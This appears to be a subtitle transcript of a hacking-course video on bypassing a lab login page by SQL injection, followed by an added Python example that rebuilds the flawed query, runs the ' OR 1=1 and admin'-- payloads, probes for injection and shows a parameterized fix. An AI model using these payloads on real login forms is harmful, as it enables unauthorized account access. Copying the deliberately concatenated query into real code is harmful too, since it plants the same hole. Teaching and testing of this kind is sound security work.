1
00:00:02,460 --> 00:00:10,150
OK, so now we know that we can put any code we want in here and it's going to be executed on the system.

2
00:00:10,170 --> 00:00:15,740
So let's have another look now at the statement. So the statement says select * from accounts where

3
00:00:15,750 --> 00:00:21,240
username is equal to the username that we put here and password is equal to the password that we put

4
00:00:21,240 --> 00:00:22,350
there.

5
00:00:22,350 --> 00:00:28,480
Let's see if we can use that to log in without using a password, without even knowing the password.

6
00:00:28,650 --> 00:00:30,230
And I'm going to be doing that with the admin.

7
00:00:30,240 --> 00:00:33,420
So the admin username is going to be admin

8
00:00:36,570 --> 00:00:39,030
and I don't know what the password is for the admin.

9
00:00:39,150 --> 00:00:43,560
So I'm going to do, I'm just going to put anything.

10
00:00:43,600 --> 00:00:50,850
So nothing really, any random password, and any code that I should run here. We were doing

11
00:00:50,860 --> 00:00:53,430
and one is equal to one, and or stuff.

12
00:00:53,440 --> 00:01:00,360
So what I'm going to do is I'm going to do or instead of and, and then I'm going to say one is equal to one.

13
00:01:00,440 --> 00:01:08,120
So what our code is going to be when I say run this, once I inject this, this is going to go in here like

14
00:01:08,120 --> 00:01:12,430
we were doing before, so our code is going to look like this.

15
00:01:12,440 --> 00:01:16,890
So it's going to be select * from accounts where username is equal to admin

16
00:01:17,950 --> 00:01:19,910
and the password is equal to a.

17
00:01:19,910 --> 00:01:20,970
Now this is wrong,

18
00:01:21,960 --> 00:01:25,080
or one is equal to one, which is right.

19
00:01:25,320 --> 00:01:29,610
So any time you have an or, if the or condition is right, everything is right.

20
00:01:29,610 --> 00:01:31,610
That's the way the or statement works.
21
00:01:31,740 --> 00:01:34,630
So select * from accounts where username is equal to admin.

22
00:01:34,660 --> 00:01:38,300
OK, username is equal to admin and password is equal to a.

23
00:01:38,310 --> 00:01:39,300
That's wrong.

24
00:01:39,600 --> 00:01:40,630
Or one is equal to one.

25
00:01:40,640 --> 00:01:41,830
OK, I'll accept that.

26
00:01:41,940 --> 00:01:47,940
And then it's actually going to execute it and let us log in as the admin without even knowing the password

27
00:01:47,940 --> 00:01:48,870
for the admin.

28
00:01:49,200 --> 00:01:50,960
So let's try to inject this now.

29
00:01:56,480 --> 00:02:02,910
And as you can see, I was able to log in as admin, and Monkey is the signature for the admin.

30
00:02:03,180 --> 00:02:09,800
Now bypassing logins can be done in so many ways depending on the code that's written on the page and

31
00:02:09,800 --> 00:02:14,360
depending on the way you want to do it and how you're imagining the code. In all of the cases, when you

32
00:02:14,360 --> 00:02:17,150
put the single quote here, you won't see this message.

33
00:02:17,150 --> 00:02:22,340
Sometimes you do see it, which makes your job so much easier. If you don't, then you kind of need to guess

34
00:02:22,340 --> 00:02:23,870
what it looks like.

35
00:02:23,870 --> 00:02:28,610
So I'm going to show you another example of bypassing, instead of injecting the code like this.

36
00:02:29,310 --> 00:02:35,240
The username parameter is actually injectable as well. As you see, when I put the single quote, the parameter

37
00:02:35,280 --> 00:02:42,010
is injectable exactly the same way as the password, so we can inject code in the username as well.

38
00:02:42,360 --> 00:02:46,920
And what I'm going to do now, so let's have a look at this, and I'm just going to reset it to the way

39
00:02:46,920 --> 00:02:48,230
it would usually look like.
40
00:02:48,240 --> 00:02:56,060
So you'd have the username and password as the fields, and whatever you put in here is going to

41
00:02:56,060 --> 00:02:59,260
be substituted in the username and password.

42
00:02:59,600 --> 00:03:05,800
So let's try to inject something in the username, and what I'm going to say is I'm going to say username

43
00:03:05,800 --> 00:03:12,340
is equal to admin, and then I'm going to close the quote myself, and then I'm going to add a comment.

44
00:03:12,560 --> 00:03:17,480
So my statement, when I run this statement, is going to look like this, and I'm actually just going to

45
00:03:17,480 --> 00:03:18,570
copy it here.

46
00:03:18,890 --> 00:03:27,630
And when I inject, when I put this code in here in the username, it's going to inject that in there.

47
00:03:27,660 --> 00:03:32,350
So this is what the code is going to look like. It's going to select * from accounts where username

48
00:03:32,370 --> 00:03:34,030
is equal to admin.

49
00:03:34,320 --> 00:03:40,670
I close the quote myself here using this right there, and then I've added a comment.

50
00:03:40,680 --> 00:03:43,660
So basically all of this is not even going to be executed.

51
00:03:43,950 --> 00:03:49,050
So the code is going to be this: it's going to be select * from accounts where username is equal

52
00:03:49,050 --> 00:03:54,220
to admin, and it'll let me log in without even entering anything in the password.

53
00:03:54,660 --> 00:03:56,950
So let's do this.

54
00:03:57,130 --> 00:04:03,310
I'm going to put my username as admin, and I close the quote and add a comment, and then you can put

55
00:04:03,310 --> 00:04:04,510
any password you want.

56
00:04:04,570 --> 00:04:11,530
I'm just going to put number one, and I'm going to log in, and as you can see I managed to log in as

57
00:04:11,530 --> 00:04:13,470
admin.

58
00:04:13,650 --> 00:04:16,080
So again, this is black box testing.
59
00:04:16,080 --> 00:04:21,270
So you don't really see the code. In many cases you want to be playing around with it and see how it

60
00:04:21,270 --> 00:04:22,290
works for you.

61
00:04:22,470 --> 00:04:28,500
But the main thing is you want to test if the SQL injection exists, and you'd do that using the

62
00:04:28,500 --> 00:04:30,610
method we showed you in the previous video.

63
00:04:30,660 --> 00:04:36,960
So try a single quote, try the and statement, try a true and statement, so one is equal to one, and then

64
00:04:36,960 --> 00:04:40,650
a false and statement, so one is equal to zero or two is equal to zero.

65
00:04:40,800 --> 00:04:47,580
And if they work as expected, then your target has an SQL injection and you can start playing around

66
00:04:47,580 --> 00:04:47,970
with it.
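The following is an added worked example and is not part of the transcript above or of the course's own lab code. It rebuilds, in Python against an in-memory SQLite table, the login statement the video describes (select * from accounts where username = '...' and password = '...' assembled by string concatenation), runs the two bypass payloads from the video (or 1=1 in the password field, admin'-- in the username field), runs the quote / and 1=1 / and 1=0 probe from the last cue, and shows the same lookup written with bound parameters. The table contents, column names and the passwords are constructed for the demo; only the admin account and its "Monkey!" signature come from the video. The payloads end in "-- " (with a trailing space) so that the quote the page appends is swallowed by the comment; the video's lab uses MySQL, where "#" works as well, while SQLite and PostgreSQL accept "-- ".

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lab's accounts table (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, signature TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("admin", "s3cr3t", "Monkey!"),                 # first row, as in the video
         ("john", "monkey", "I like the smell of confunk")],
    )
    return conn


def vulnerable_login(conn, username, password):
    """Login built the way the transcript describes: both fields are pasted
    straight into the SQL text. Returns (username, signature) or None."""
    query = ("SELECT username, signature FROM accounts WHERE username = '"
             + username + "' AND password = '" + password + "'")
    # Like most login pages, the application takes the first row that comes back.
    return conn.execute(query).fetchone()


def safe_login(conn, username, password):
    """The same lookup with bound parameters: the input is data, never SQL."""
    query = "SELECT username, signature FROM accounts WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


# Payload for the password field. AND binds tighter than OR, so the WHERE
# clause becomes (username = ... AND password = 'a') OR 1=1, which is true
# for every row; the trailing comment eats the closing quote the page adds.
OR_TRUE = "a' OR 1=1 -- "

# Payload for the username field: closes the quote and comments out the
# rest of the statement, so the password check is never executed.
ADMIN_NO_PASSWORD = "admin' -- "


def probe_for_sqli(login, conn, username, known_password):
    """The check from the end of the transcript, run against the password field.
    A lone quote should break the query, ' AND 1=1 should behave like the
    baseline request, and ' AND 1=0 should not. Returns the three observations."""
    baseline = login(conn, username, known_password)
    try:
        login(conn, username, known_password + "'")
        quote_errors = False
    except sqlite3.OperationalError:        # unterminated string literal
        quote_errors = True
    true_case = login(conn, username, known_password + "' AND 1=1 -- ")
    false_case = login(conn, username, known_password + "' AND 1=0 -- ")
    return {
        "quote_errors": quote_errors,
        "true_matches_baseline": true_case == baseline,
        "false_differs": false_case != baseline,
    }


def is_injectable(login, conn, username, known_password):
    """All three probe results must line up before calling the field injectable."""
    return all(probe_for_sqli(login, conn, username, known_password).values())


if __name__ == "__main__":
    db = make_db()
    print("or 1=1 in password  ->", vulnerable_login(db, "admin", OR_TRUE))
    print("admin'-- in username ->", vulnerable_login(db, ADMIN_NO_PASSWORD, "1"))
    print("same payloads, bound params ->",
          safe_login(db, "admin", OR_TRUE), safe_login(db, ADMIN_NO_PASSWORD, "1"))
    print("probe (vulnerable):", is_injectable(vulnerable_login, db, "john", "monkey"))
    print("probe (safe):      ", is_injectable(safe_login, db, "john", "monkey"))
```

One caveat worth seeing in the code: the or 1=1 payload does not "log in as admin" because of anything admin-specific; it returns every row, and you land in whichever account the application reads first (admin here only because it is the first row, exactly as in the video). The admin'-- payload in the username field is what actually picks a target account.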